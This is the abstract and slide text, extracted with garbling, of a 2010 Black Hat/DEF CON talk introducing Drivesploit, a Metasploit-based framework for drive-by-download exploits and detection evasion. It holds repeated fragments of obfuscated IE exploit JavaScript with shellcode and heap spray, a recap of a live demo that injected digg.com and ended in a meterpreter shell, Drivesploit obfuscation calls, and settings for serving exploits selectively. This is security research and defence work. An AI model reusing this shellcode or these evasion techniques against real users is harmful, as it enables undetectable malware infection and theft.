Given at black hat and DEF CON 2010 by Wayne Huang and team.
https://www.defcon.org/html/defcon-18/dc-18-speakers.html#Huang
http://www.blackhat.com/html/bh-us-10/bh-us-10-briefings.html#Huang
DRIVESPLOIT: CIRCUMVENTING BOTH AUTOMATED AND MANUAL DRIVE-BY-DOWNLOAD DETECTION
This year saw the biggest news in Web security ever--Operation Aurora, which aimed at stealing source code and other intellectual properties and succeeded with more than 30 companies, including Google. Incidence response showed that the operation involved an IE 0-day drive-by-download, resulting in Google's compromise and leak of source code to jump points in Taiwan. The US Government is so concerned that they issued a demarche to the Chinese government.
Using real, live examples, we will show how easy it is to exploit injection-based, XSS-based, and CSRF-based vulnerabilities in FaceBook, Google, Digg, LinkedIn, and other popular websites, and inject drive-by downloads.
If drive-bys are so easy to inject into high-traffic websites, then the question becomes, how easy it is to make them undetectable by automated malware scanning services (such as Google's) and by human manual inspection? We will demonstrate how easy it is to defeat automated detection mechanisms and overview commonly used techniques.
We will reveal for the first time, in this conference, some very advanced techniques that are almost impossible to overcome by automated analysis in the past, now, and in the future. We will release Drivesploit, a drive-by download exploit framework implemented on top of Metasploit. We will go into depth on two particular techniques supported by Drivesploit's a) javascript obfuscation based on behavior-based fingerprinting, and b) javascript timelock puzzles. We will have live demos to show how this technique easily defeats both automated AND manual detection.
At the very beginning of our talk, we will be giving out a digg.com page, which we have infected with a drive-by download created with Drivesploit. Visiting this page with the right browser will trigger the exploit and download a malware that steals browser cookie files. The whole process will be undetectable by antivirus. The actual javascript drive-by code contains a secret phrase. We will give out an ipad to whomever from the audience that is able to correctly deobfuscate the javascript and give out the secret phrase.
Finally, we will present case studies on systems and processes that the largest organizations have put in place in order to fight against Web-based malware. We will also present case studies of our incidence response efforts with organizations hit by Web malware injections such as Google's aurora incident. Based in Taiwan, Co-speaker Wayne has been personally involved in such incidence response efforts since the late 90's.
All source codes related to POC exploits against FaceBook, Google, Digg, LinkedIn, etc, as well as source code of Drivesploit, will be released as open source at the conference.
Attendees will gain the following:
1. Understanding of drive-by downloads and associated terminologies.
2. Information about various drive-by download infection vectors.
3. Appreciation of tools helpful for drive-by analysis, including Malzilla, spikermonkey, rhino, burp and wepawet
4. Realize why drive-by downloads are hard to analyze and detect. Why antivirus fail, why behavior-based approaches fail, and why even manual efforts are difficult
5. Learning the Drivesploit framework and how it can be used to develop poc drive-bys
6. Learning two new deadly techniques: behavior-based browser finterprinting and javascript timelock puzzles
7. Learning how to implement above two using Drivesploit to defeat both automated and manual drive-by analysis
8. Knowledge about the available countermeasures to this threat
4. Drive-by-Download Explained
• Affected websites:
– Essentially becomes a delivery mechanism for
malware
– Appear normal
• Victims
– Do not need to "click" or "agree to" anything
– Simply connecting to the website executes the
attack
4
5. Drive-by Download Incidents
• Aurora (Google)
– June 2009-Feb 2010
–TTargeted attack
t d tt k
– IE 0day CVE-2010-0249
– Confirmed publicly by Google,
Adobe Systems, Juniper Networks
and R kS
d RackSpace
– Total of 34 organization targeted
g g
6. Drive-by Download Incidents
• DNF666 Mass SQL Injection
– Since March, 2010
–JJun: Adobe 0day CVE-2010-1297
Ad b 0d CVE 2010 1297
– Victims: Wall Street Journal,
Jarusalem P t etc
J l Post, t
– dnf666.net, robint.us, 2677.in,
4589.in, 22d f
4589 i 22dnf.com
13. Dissecting Drive-By Downloads
Page + Browser
Page + Browser
Exploit
Payload = Exploit Server
downloader
d l d
<script>var sc = unescape("
%u9090%u19eb%u4b5b%u3390%u90c9%u7b80%ue901%u0175%u66c3%u7bb9%u8004%u0b34%ue2d8%uebfa%ue805
%uffe2%uffff%u3931%ud8db%u87d8%u79bc%ud8e8%ud8d8%u9853%u53d4%uc4a8%u5375%ud0b0%u2f53%ud7b2
%u3081%udb59%ud8d8%u3a48%ub020%ueaeb%ud8d8%u8db0%ubdab%u8caa%u9e53%u30d4%uda37%ud8d8%u3053
%ud9b2%u3081%udbb9%ud8d8%u213a%ub7b0%ud8b6%ub0d8%uaaad%ub5b4%u538c%ud49e%u0830%ud8da%u53d8
var arr = new Array; for (var i = 0; i < sss.length; i ++ ){ arr[i] = String.fromCharCode(sss[i]/7); } var
cc=arr.toString();cc=cc.replace(/ ,/ g, "" ); cc = cc.replace(/@/g, ","); eval(cc); var x1 = new Array(); for (i = 0; i <
200; i ++ ){ x1[i] = document.createElement("COMMENT"); x1[i].data = "abc"; } ; var e1 = null; function ev1(evt){
e1 = document.createEventObject(evt); document.getElementById("sp1").innerHTML = "";
window.setInterval(ev2, 50); } function ev2(){ p = " 13
14. Dissecting Drive-By Downloads
Exploit!
Page + Browser
Page + Browser
Exploit
Payload = Exploit Server
downloader
d l d
<script>var sc = unescape("
%u9090%u19eb%u4b5b%u3390%u90c9%u7b80%ue901%u0175%u66c3%u7bb9%u8004%u0b34%ue2d8%uebfa%ue805
%uffe2%uffff%u3931%ud8db%u87d8%u79bc%ud8e8%ud8d8%u9853%u53d4%uc4a8%u5375%ud0b0%u2f53%ud7b2
%u3081%udb59%ud8d8%u3a48%ub020%ueaeb%ud8d8%u8db0%ubdab%u8caa%u9e53%u30d4%uda37%ud8d8%u3053
%ud9b2%u3081%udbb9%ud8d8%u213a%ub7b0%ud8b6%ub0d8%uaaad%ub5b4%u538c%ud49e%u0830%ud8da%u53d8
var arr = new Array; for (var i = 0; i < sss.length; i ++ ){ arr[i] = String.fromCharCode(sss[i]/7); } var
cc=arr.toString();cc=cc.replace(/ ,/ g, "" ); cc = cc.replace(/@/g, ","); eval(cc); var x1 = new Array(); for (i = 0; i <
200; i ++ ){ x1[i] = document.createElement("COMMENT"); x1[i].data = "abc"; } ; var e1 = null; function ev1(evt){
e1 = document.createEventObject(evt); document.getElementById("sp1").innerHTML = "";
window.setInterval(ev2, 50); } function ev2(){ p = " 14
17. Dissecting Drive-By Downloads
Exploits / droppers
Exploits / droppers
Exploit Server
Malware
Malware Server
Controller 17
18. Dissecting Drive-By Downloads
But who would visit?
But who would visit?
The key now is TRAFFIC
Exploits / droppers
Exploits / droppers
Exploit Server
Malware
Malware Server
Controller 18
19. (1) Legitimate, injectable sites
URL Generators
Landing Site
Landing Site
Exploits / droppers
Exploits / droppers
Exploit Server
Malware
Malware Server
Controller 19
20. (1) Legitimate, injectable sites
URL Generators
Landing Site
Landing Site
May-Ongoing:/ DNF666 mass SQ
ay O go Exploits droppers 666 ass SQL
g
Exploits / droppers
injections Exploit Server
May-June: Shared hosting compromise,
Malware
GoDaddy, RackSpace,
GoDaddy RackSpace Network
Solutions, BlueHost, DreamHost
Malware Server
Continuous targeted attacks
20
21. (1) Legitimate, vulnerable sites
URL Generators
Landing Site
Landing Site
Mass SQL injections
Exploits / droppers
Exploits / droppers
Mass hosting compromises
Exploit Server
Directly inside HTML / PHP / ASP
Malware
Hidden inside WorldPress files
Hidden inside DB Malware Server
Hidden inside DB stored procedures
21
22. (2) Man-in-the-Middle
WAN LAN
URL Generators
Landing Site
Landing Site
No tampering of website
p Exploits / droppers
g
Exploits / droppers
LAN: ARP spoofing via ZXARPS and other
Exploit Server
tools
Malware
WAN: March 2009, middle of route
2009 route,
tw.msn.com, taiwan.cnet.com, others
Malware Server
Cisco advisory:
http://tools.cisco.com/security/center/viewAlert.x?alertId=17778
22
26. Live demo recap
1. Inject javascript into digg.com
j j p gg
2. Javascript loads iframe from our domain
zcrack.org
3. Metasploit (drivesploit) is running on
zcrack.org,
zcrack org serves ie peers exploit
4. Bypasses AV
5. IE visitor attacked, IE crashes,
meterpreter starts, jumps process to
notepad.exe
notepad exe
6. We have a shell :)
27. MOTIVATION
We provide solutions that monitors
p
websites and detect malicious
contents 24 7
t t 24x7
We use multiple behavior-, heuristic-,
p , ,
and signature-based technologies
27
29. MOTIVATION
We spend a lot of time testing our own
technologies, and selecting anti-virus
technologies
t h l gi
The key is: how good are we (and them) at
detecting NEW drive-by downloads
29
30. MOTIVATION
We need a good framework to help us
g p
replicate, manipulate, and mutate
exploits found in the wild
--into NEW derivatives
30
33. Antivirus vs. Drive-bys
URL Generators
Landing Site
Landing Site
Exploits / droppers
Exploits / droppers
Exploit Server
Malware
Malware Server
Controller 33
34. Antivirus vs. Drive-bys
JAVASCRIPT
URL Generators
Landing Site
Landing Site
JAVASCRIPT
Exploits / droppers
Exploits / droppers
JAVASCRIPT
Exploit Server
Malware
PE BINARY
PE BINARY
Malware Server
Controller 34
35. Antivirus vs. Drive-bys
JAVASCRIPT
URL Generators
Landing Site
Landing Site
JAVASCRIPT
Exploits / droppers
Exploits / droppers
JAVASCRIPT
Exploit Server
Malware
PE BINARY
PE BINARY
Malware Server
We will detect
We will detect
Controller 35 this part!!
36. Why we can’t rely on PE detection
• Exploit server domains are often taken down
after a few days, but the injected URL generators
and the exploit servers live on
– Attack reported to the hosting / registrar
– Domain banned by ISPs
– Purchased duration was over
• We want to detect the injection so our customers
can remove it
• Actually statically detecting javascript exploits is
Actually,
quite difficult
36
38. JAVASCRIPT!! (ECMA-SCRIPT)
URL Generators
Landing Site
Landing Site
Exploits / droppers
Exploits / droppers
Exploit Server
Malware
Malware Server
Controller 38
39. JAVASCRIPT!! (ECMA-SCRIPT)
URL Generators
Landing Site
Landing Site
Exploits / droppers
Exploits / droppers
Exploit Server
Malware
Controller 39
40. JAVASCRIPT!! (ECMA-SCRIPT)
URL Generators
Landing Site
Landing Site
Exploits / droppers
Exploits / droppers
Exploit Server
Controller 40
41. JAVASCRIPT!! (ECMA-SCRIPT)
URL Generators
Landing Site
Landing Site
Exploits / droppers
Exploits / droppers
Exploit Server
(METASPLOT)
Controller 41
42. JAVASCRIPT!! (ECMA-SCRIPT)
URL Generators
Landing Site
Landing Site
Exploits / droppers
Exploits / droppers
PAYLOAD Exploit Server
meterpreter (METASPLOT)
(memory
injection)
Controller 42
43. Drive-By wants to…
• Avoid detection at the victim's
desktop
• Avoid detection by UTM/gateways
• Avoid detection
by
b automated
t t d
monitors
• Live for as long
as possible
ibl
45. Serve Selectively
HTTP LEVEL:
Serve only to:
• Fresh IPs (serve once per IP)
set HTTP::client::onlyonce true
• Particular referer (eg Gumblar)
(eg.
set HTTP::referer google.com
• Particular agent string (vulnerable browser)
set HTTP::agent::MSIE 7.0
• Black list
set HTTP::client::blacklist false
53. JAVASCRIPT EXPLOIT DISEC
Shellcode
OBFUSCATED
M Corrupt BLOB
Heapspray
DE‐
Trigger
gg OBFUSCATOR
Primitive Obfuscated
Form
F Form
F
54. Dissecting Drive-By Downloads
Exploit!
Page + Browser
Page + Browser
Exploit
Payload = Exploit Server
downloader
d l d
<script>var sc = unescape("
%u9090%u19eb%u4b5b%u3390%u90c9%u7b80%ue901%u0175%u66c3%u7bb9%u8004%u0b34%ue2d8%uebfa%ue805
%uffe2%uffff%u3931%ud8db%u87d8%u79bc%ud8e8%ud8d8%u9853%u53d4%uc4a8%u5375%ud0b0%u2f53%ud7b2
%u3081%udb59%ud8d8%u3a48%ub020%ueaeb%ud8d8%u8db0%ubdab%u8caa%u9e53%u30d4%uda37%ud8d8%u3053
%ud9b2%u3081%udbb9%ud8d8%u213a%ub7b0%ud8b6%ub0d8%uaaad%ub5b4%u538c%ud49e%u0830%ud8da%u53d8
var arr = new Array; for (var i = 0; i < sss.length; i ++ ){ arr[i] = String.fromCharCode(sss[i]/7); } var
cc=arr.toString();cc=cc.replace(/ ,/ g, "" ); cc = cc.replace(/@/g, ","); eval(cc); var x1 = new Array(); for (i = 0; i <
200; i ++ ){ x1[i] = document.createElement("COMMENT"); x1[i].data = "abc"; } ; var e1 = null; function ev1(evt){
e1 = document.createEventObject(evt); document.getElementById("sp1").innerHTML = "";
window.setInterval(ev2, 50); } function ev2(){ p = " 54
55. JAVASCRIPT EXPLOIT DISEC
Shellcode
OBFUSCATED
M Corrupt BLOB
Heapspray
DE‐
Start Trigger
gg OBFUSCATOR
Primitive Obfuscated
Form
F Form
F
56. JAVASCRIPT EXPLOIT DISEC
Shellcode
OBFUSCATED
M Corrupt BLOB
Mutate
Heapspray
DE‐
Start Trigger
gg OBFUSCATOR
Primitive Obfuscated
Form
F Form
F
57. JAVASCRIPT EXPLOIT DISEC
Shellcode
OBFUSCATED
M Corrupt BLOB
Mutate
Heapspray
DE‐
Start Trigger
gg OBFUSCATOR
Primitive Obfuscated
Form
F Prevent
Form
F
59. 1. Javascript Random Variable Auto
Replacement
• Accepts a piece of javascript
p p j p
• Parses the javascript according to
grammer
• Auto replaces all variable names and
function names with random names
• Passes back:
a) the new javascript
b) a vector of old-new name mappings
) pp g
60. 1. Javascript Random Variable Auto
Replacement
randomized =
Rex::Exploitation::DriveSploit::obfusca
tejs(js,
j (j ,
Rex::Exploitation::DriveSploit::AUTO_R
ANDOM_VARS)
61. 2. Javascript Concat String
Obfuscation
Obf ti
arr =
Rex::Exploitation::DriveSploit.obfusca
tejs(shellcode,
t j ( h ll d
Rex::Exploitation::DriveSploit::STRING
CONCAT)
shellcode script = arr[0]
h ll d i t [0]
shellcode_var = arr[1]
66. 3. Javascript Random Text Insertion
insertret =
Rex::Exploitation::DriveSploit.getInse
rtion(shellcode, 4, 6, 10)
shellcode = insertret[0]
random insertion string = insertret[1]
67. 3. Javascript Random Text Insertion
insertret =
Rex::Exploitation::DriveSploit.getInse
rtion(shellcode, 4, 6, 10)
# insert a fixed 6-character random
# string, for every 4-8 characters
returns
a) a piece of javascript containing the
injected string
b) Javascript variable name containing
the reverted, original string
83. ANTIVIRUS DESKTOP VERSION
• Can monitor host environment
– Hook into browsers
– Easier to get raw form of
exploit
• Behavior analysis
– Buffer overflow behavior
– Download to file behavior
Download-to-file
94. 5. Fingerprinting-Based Encryption
Summary
• "This exploit works only for IE6"
This IE6
• "Give me an encrypted version of my
javascript exploit”
j i t l it”
• "Give me javascript to generate the
decoding key"
• "The key is only correctly generated if the
y y yg
javascript is run under IE6"
94
98. Why not Anti-Virus?
• AV is to install on desktops / notebooks
p
• Complicated normal behaviors
• Strict resource constraints
• Therefore, AV and gateway vendors rely
on:
– Signature-based pattern matching technologies
– LIGHTWEIGHT and ACCURATE
• Why can’t such technology used to detect
drive-by-downloads?
98
100. … so they are usually not reused
AV no good because drive-by-downloads are in:
g y
• Disposable Javascript
• Disposable PDF Adobe JS
• Disposable Flash actionscript
• All ECMA-
scripts
you don't usually reuse them…
100
101. Javascript Packing Is a Norm
• Packing is widely used by legitimate code!
– To protect javascript source code
– To reduce javascript size
• Google Closure Compiler
– http //code google com/clos e/compile /
http://code.google.com/closure/compiler/
• Yahoo Javascript Packer (YUI Compressor)
– http://developer.yahoo.com/yui/compressor/
p // p y /y / p /
• Advanced HTML Protector
– http://www.creabit.com/htmlprotect/
• D
Dean Edwards’ Packer
Ed d ’P k
– http://dean.edwards.name/packer/
• Online JS Obfuscator
– http://www.iwebtool.com/html_encrypter
• http://www.cha88.cn/safe/fromCharCode.php
101
102. … OK so AV doesn t work (that well)…
doesn’t well)
How about behavior-based approaches?
102
103. Defeating Behavior Analysis
1. Use VBScript
– Exploits in VBScript
– URL generators in VBScript
– Exploits in / generated by VBScript
– May defeat SpiderMonkey et al (Rhino,
JSunPack, etc)
2. Don’t serve to detectors
– You can’t detect what you don’t have
– Serve to each IP only once
– Detect agent strings
– Collect robot IPs—Google, Yahoo, security
vendors
103
104. Defeating Behavior Analysis
3. Fingerprint-based encryption
g p yp
3. Little b effective techniques
l but ff h
– Sleep(30000); //using SetTimeout
– Timelock puzzles
104
105. Future Work
• Randomly chop up scripts and split into
individual f l
d d l files
• Generating VBscript instead of javascript
g p j p
• Encrypting
using data
existing
outside of
HTML
– HTTP headers
106. Discussion
• The Panopticlick experiment by
p p y
Eckersley of EFF
– 94.2% of "typical desktop browsers” are unique
yp p q
• Can fingerprinting-based encryption
be integrated with this type of
individual fingerprinting, to prevent
detection and analysis of target
attacks?
108. References
• James Lee, Using guided missles in drive-bys
http://www.slideshare.net/egypt/using guided missiles in
http://www slideshare net/egypt/using-guided-missiles-in-
drivebys-automatic-browser-fingerprinting-and-exploitation-with-
the-metasploit-frameworks-browser-autopwn
• Sebastian Porst, How to really obfuscate your
, y y
PDF malware http://www.slideshare.net/cblichmann/how-
to-really-obfuscate-your-pdf-malware
• Jeremy Chiu, 0box analyzer: afterdark
runtime forensics for automated malware
analysis and clustering
http://www.slideshare.net/wayne_armorize/0-box-analyzer-
afterdark-runtime-forensics-for-automated-malware-analysis-and-
ft d k ti f i f t t d l l i d
clustering-2
• HeapLib support added to Metasploit 3
http://blog.metasploit.com/2007/04/heaplib-support-added-to-
http://blog metasploit com/2007/04/heaplib support added to
metasploit-3.html